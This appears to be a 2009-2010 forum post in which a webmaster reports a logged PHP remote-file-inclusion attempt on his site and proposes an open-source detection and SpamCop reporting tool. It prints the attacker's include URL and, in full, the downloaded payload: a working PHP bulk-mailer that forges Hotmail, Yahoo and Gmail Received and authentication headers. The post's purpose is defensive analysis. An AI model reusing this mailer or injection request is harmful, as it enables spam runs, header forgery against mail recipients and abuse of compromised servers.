T-Qualizer.com

Members
  • Content count

    1
  • Joined

  • Last visited

Community Reputation

0 Neutral

About T-Qualizer.com

  • Rank
    Newbie
  1. On my websites, I'm running a small detection tool for php-code injections. It automatically donwloads the file, the hacker tries to include. Below I show you a real example from my log files and the downloaded spammer tool. This stuff makes clear where the increased spamruns of the last time come from. My suggestion is to offer my detection tool as an opensource project and expand it to a realtime reporting tool that's able to report this attempts straight to SpamCop. Off course this requires also a SpamCop-side tool to recieve them. As opensource project it may be expanded to a complete honeypot to detect and eleminate spamruns before they have done their job. Here is a example of a nice hacker spam action, real happend and logged from my website. Nothing is faked or changed. Requested URL on 2009-12-29 at 21:56 gmt, from IP [82.155.84.123] (bl6-84-123.dsl.telepac.pt): www.t-qualizer.eu/index.php?sessid=y1ufj9funveq5dw50l〈=en&page=http://www.srconline.com.br/zoomla/administrator/components/com_comprofiler/language/cs.txt? You can see that the hacker tried to include a url in the hope that it will be executed. Here comes the scri_pt, downloaded by my detection tool from: www.srconline.com.br/zoomla/administrator/components/com_comprofiler/language/cs.txt? At the time I'm writing this post, 11 day's later, it's still online! <html> <head> <title>35437282898562626475892888</title> <style type="text/css"> <!-- .cxtexto { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 9px; border: thin #000000; background-color: #FFFFFF; color: #000000; } --> </style> </head> </div> <table width="516" border="0" cellpadding="0" cellspacing="0" bgcolor="#CCCCCC" id="table1"> <form name="form1" method="post" action="" enctype="multipart/form-data"> <input name="teste" type="hidden" class="cxtexto" id="teste" value="yep" size="3" maxlength="3"> <tr> <td colspan="4" valign="top">  </td> </tr> <tr> <td valign="top"> <div align="right"> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> <strong>nome</strong></font></div></td> <td valign="middle" bgcolor="#CCCCCC">  <input name="NRemetente" type="text" class="cxtexto" id="NRemetente" value="<?php echo stripslashes($_POST['NRemetente']);?>" size="33" maxlength="60"></td> <td valign="middle" bgcolor="#CCCCCC"> <div align="right"><strong> <font face="Verdana, Arial, Helvetica, sans-serif" size="1"> email</font></strong></div></td> <td valign="middle" bgcolor="#CCCCCC">  <input name="ERemetente" type="text" class="cxtexto" id="ERemetente" value="<?php echo stripslashes($_POST['ERemetente']);?>" size="39" maxlength="60"></td> </tr> <tr> <td valign="top" colspan="4" height="2"></td> </tr> <tr> <td valign="top"> <div align="right"><strong> <font face="Verdana, Arial, Helvetica, sans-serif" size="1"> assunto</font></strong></div> </td> <td valign="middle" bgcolor="#CCCCCC">  <input name="Assunto" type="text" class="cxtexto" id="Assunto" value="<?php echo stripslashes($_POST['Assunto']);?>" size="33" maxlength="60"></td> <td valign="middle" bgcolor="#CCCCCC"> <div align="right"><strong> <font face="Verdana, Arial, Helvetica, sans-serif" size="1"> lista</font></strong></div></td> <td valign="middle" bgcolor="#CCCCCC" class="cxprocura">  <input name="emails" type="file" class="cxtexto" id="emails"></td> </tr> <tr> <td colspan="4" valign="top" height="2"></td> </tr> <tr> <td colspan="2" valign="top"> <div align="center"> <strong> <font face="Verdana, Arial, Helvetica, sans-serif" size="1">i</font></strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>ntervalo </strong></font> <input name="Interval" type="text" class="cxtexto" id="interval" value="0" size="3" maxlength="3"> <font size="1" face="Verdana, Arial, Helvetica, sans-serif"> <strong>segundos</strong></font></div></td> <td colspan="2" valign="middle" bgcolor="#CCCCCC"> <p align="center"> <input type="submit" name="Submit2" value="enviar"> <input name="Submit" type="button" onClick='window.close()' value="desistir"></td> </tr> <tr> <td colspan="4" valign="top"> <p align="center"><strong> <font face="Verdana, Arial, Helvetica, sans-serif" size="1">conteudo</font></strong></td> </tr> <tr> <td colspan="4" align="center"> <p align="center"> <textarea name="Conteudo" cols="92" rows="24" wrap="VIRTUAL" class="cxtexto" id="Conteudo"><?php echo stripslashes($_POST['Conteudo']);?></textarea></td> </tr> <tr> <td colspan="4" valign="top">  </td> </tr> </form> </table> <?php //Source PHP //Para melhor 'debuging' //error_reporting(E_ALL); [at]ignore_user_abort(TRUE); error_reporting(0); [at]set_time_limit(0); ini_set("memory_limit", "-1"); //Verifica se os dados foram preenchidos $teste = $_POST['teste']; If ($teste == null) { exit(/*"<br><center><b>Preencha corretamente os campos</b></center>"*/); } //Recupera os dados do FORM $FromName = $_POST['NRemetente']; $FromMail = $_POST['ERemetente']; $Subject = $_POST['Assunto']; $MailServer = explode("[at]",$FromMail,2); $MailServer = $MailServer['1']; $arq_name = $_FILES["emails"]["name"]; $arq_temp = $_FILES["emails"]["tmp_name"]; $Lista = (file($arq_temp)); $QtdMail = count($Lista); $Conteudo = stripslashes($_POST['Conteudo']); $IntervalX = $_POST['Interval']; $ip = gethostbyname($MailServer); //Arquivos de configuracao [at]ini_set("sendmail_from", $FromMail); [at]ini_set("time_limit",0); //Define os headers do email // $headers = "From: $FromName <$FromMail>\n"; // $headers .= "MIME-Version: 1.0\n"; // $headers .= "Content-type: text/html; charset=iso-8859-1\n"; // $headers .= "Content-Transfer-encoding: 8bit\n"; // $headers .= "Reply-To: $FromName <$FromMail>\n"; // $headers .= "Return-Path: $FromMail\n"; // $headers .= "Message-ID: <".md5(uniqid(time()))."[at]$MailServer>\n"; // $headers .= "X-Priority: 3\n"; // $headers .= "X-MSmail-Priority: High\n"; // $headers .= "X-Mailer: Microsoft Office Outlook, Build 11.0.5510\n"; // $headers .= "X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441\n"; // $headers .= "X-Mailer: iGMail [www.ig.com.br]\n"; // $headers .= "X-Originating-Email: [$FromName]\n"; // $headers .= "X-Sender: $FromName\n"; // $headers .= "X-Originating-IP: [201.201.120.121]\n"; // $headers .= "X-iGspam-global: Unsure, spamicity=0.570081 - pe=5.74e-01 - pf=0.574081 - pg=0.574081\n"; //Inicia o envio If ($QtdMail <= 1) { exit; } else { echo str_repeat("-", 126)."<br>"; echo "<b>De:</b> $FromName <$FromMail><br>"; echo "<b>Assunto:</b> $Subject<br>"; echo "<b>Para Lista:</b> $arq_name ($arq_temp) <b>contendo</b> $QtdMail <b>e-mails</b><br>"; echo "<b>Com intervalo de:</b> $IntervalX <b>segundos</b><br>"; echo str_repeat("-", 126)."<br>"; } $error = 0; $donen = 0; while (list($pos, $val) = each($Lista)) { $val = trim($val); if (strstr(strtolower(htmlentities($val)), 'yahoo') == '' && strstr(strtolower(htmlentities($val)), 'hotmail') == '' && strstr(strtolower(htmlentities($val)), 'live') == '') { //echo "\r\n ENTRA GMAIL \r\n"; $ip1 = gethostbyname('blu0-omc2-s14.blu0.hotmail.com'); $ip2 = gethostbyname('mta269.mail.re4.yahoo.com'); $headers = "X-Apparently-To: " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n"; $headers .= "Return-Path: <" . $FromMail . ">\r\n"; $headers .= "X-YMailISG: " . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "--\r\n"; $headers .= "X-Originating-IP: [" . $ip1 . "]\r\n"; $headers .= "Authentication-Results: mta269.mail.re4.yahoo.com from=hotmail.com; domainkeys=neutral (no sig); from=hotmail.com; dkim=neutral (no sig)\r\n"; $headers .= "Received: from " . $ip1 . " (EHLO blu0-omc2-s14.blu0.hotmail.com) (" . $ip2 . ") by mta269.mail.re4.yahoo.com with SMTP; Tue, " . date("j M Y G:i:s") . " -0700\r\n"; $headers .= "Received: from BLU119-W27 ([" . $ip1 . "]) by blu0-omc2-s14.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959); Tue, " . date("j M Y G:i:s") . " -0700\r\n"; $headers .= "Message-ID: <BLU119-W27705C37FAADEAEC0BCFF6E2E20[at]phx.gbl>\r\n"; $headers .= "Return-Path: " . $FromMail . "\r\n"; $headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; $headers .= "X-Originating-IP: [" . $ip . "]\r\n"; $headers .= "From: " . $FromName . " " . "<" . $FromMail . ">\r\n"; $headers .= "To: " . htmlentities($val) . "\r\n"; $headers .= "Importance: Normal\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "X-OriginalArrivalTime: " . date("j M Y G:i:s") . ".0482 (UTC) FILETIME=[82628620:01CA367C]\r\n"; $headers .= "Content-Length: " . trim(strlen($Conteudo)) . "\r\n"; } elseif (strstr(strtolower(htmlentities($val)), 'gmail') == '' && strstr(strtolower(htmlentities($val)), 'hotmail') == '' && strstr(strtolower(htmlentities($val)), 'live') == '') { //echo "\r\n ENTRA YAHOO \r\n"; $ip1 = gethostbyname('blu0-omc2-s14.blu0.hotmail.com'); $ip2 = gethostbyname('mail-fx0-f217.google.com'); $headers = "X-Apparently-To: " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n"; $headers .= "Return-Path: <" . $FromMail . ">\r\n"; $headers .= "X-YMailISG: " . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "--\r\n"; $headers .= "X-Originating-IP: [" . $ip1 . "]\r\n"; $headers .= "Authentication-Results: mail-fx0-f217.google.com from=hotmail.com; domainkeys=neutral (no sig); from=hotmail.com; dkim=neutral (no sig)\r\n"; $headers .= "Received: from " . $ip1 . " (EHLO blu0-omc2-s14.blu0.hotmail.com) (" . $ip2 . ") by mail-fx0-f217.google.com with SMTP; Tue, " . date("j M Y G:i:s") . " -0700\r\n"; $headers .= "Received: from BLU119-W27 ([" . $ip1 . "]) by blu0-omc2-s14.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959); Tue, " . date("j M Y G:i:s") . " -0700\r\n"; $headers .= "Message-ID: <BLU119-W27705C37FAADEAEC0BCFF6E2E20[at]phx.gbl>\r\n"; $headers .= "Return-Path: " . $FromMail . "\r\n"; $headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; $headers .= "X-Originating-IP: [" . $ip . "]\r\n"; $headers .= "From: " . $FromName . " " . "<" . $FromMail . ">" . " Adicionar remetente à lista de contatos\r\n"; $headers .= "To: " . htmlentities($val) . "\r\n"; $headers .= "Importance: Normal\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "X-OriginalArrivalTime: " . date("j M Y G:i:s") . ".0482 (UTC) FILETIME=[82628620:01CA367C]\r\n"; $headers .= "Content-Length: " . trim(strlen($Conteudo)) . "\r\n"; } elseif (strstr(strtolower(htmlentities($val)), 'gmail') == '' && strstr(strtolower(htmlentities($val)), 'yahoo') == '') { //echo "\r\n ENTRA HOTMAIL \r\n"; $ip1 = gethostbyname('mta269.mail.re4.yahoo.com'); $ip2 = gethostbyname('mail-fx0-f217.google.com'); $headers = "X-Apparently-To: " . htmlentities($val) . " via " . $ip . "; Tue, " . date("j M Y G:i:s") . " -0700\r\n"; $headers .= "Return-Path: <" . $FromMail . ">\r\n"; $headers .= "X-YMailISG: " . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . "." . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . md5(uniqid(time())) . "--\r\n"; $headers .= "X-Originating-IP: [" . $ip1 . "]\r\n"; $headers .= "Authentication-Results: mail-fx0-f217.google.com from=yahoo.com; domainkeys=neutral (no sig); from=yahoo.com; dkim=neutral (no sig)\r\n"; $headers .= "Received: from " . $ip1 . " (EHLO mta269.mail.re4.yahoo.com) (" . $ip2 . ") by mail-fx0-f217.google.com with SMTP; Tue, " . date("j M Y G:i:s") . " -0700\r\n"; $headers .= "Received: from BLU119-W27 ([" . $ip1 . "]) by mta269.mail.re4.yahoo.com with Microsoft SMTPSVC(6.0.3790.3959); Tue, " . date("j M Y G:i:s") . " -0700\r\n"; $headers .= "Message-ID: <BLU119-W27705C37FAADEAEC0BCFF6E2E20[at]phx.gbl>\r\n"; $headers .= "Return-Path: " . $FromMail . "\r\n"; $headers .= "Content-type: text/html; charset=iso-8859-1\r\n"; $headers .= "X-Originating-IP: [" . $ip . "]\r\n"; $headers .= "From: " . $FromName . " " . "<" . $FromMail . ">" . " Adicionar remetente à lista de contatos\r\n"; $headers .= "To: " . htmlentities($val) . "\r\n"; $headers .= "Importance: Normal\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "X-OriginalArrivalTime: " . date("j M Y G:i:s") . ".0482 (UTC) FILETIME=[82628620:01CA367C]\r\n"; $headers .= "Content-Length: " . trim(strlen($Conteudo)) . "\r\n"; } if (mail($val, $Subject, $Conteudo, $headers)) { $donen++; echo '<font color="#0033FF" size="2" face="Verdana, Arial, Helvetica, sans-serif">'; } else { $error++; echo '<font color="#FF0000" size="2" face="Verdana, Arial, Helvetica, sans-serif">'; } $headers = ""; echo htmlentities($val).' [ok='.$donen.' error='.$error.' total='.($pos+1).'/'.$QtdMail.']</font><br>'; sleep($IntervalX); } unlink($arq_temp); ?> </body> </html> If SpamCop and webmasters are interested in a detection and realtime reporting tool, then let it hear and I will post my scri_pt for a opensource project.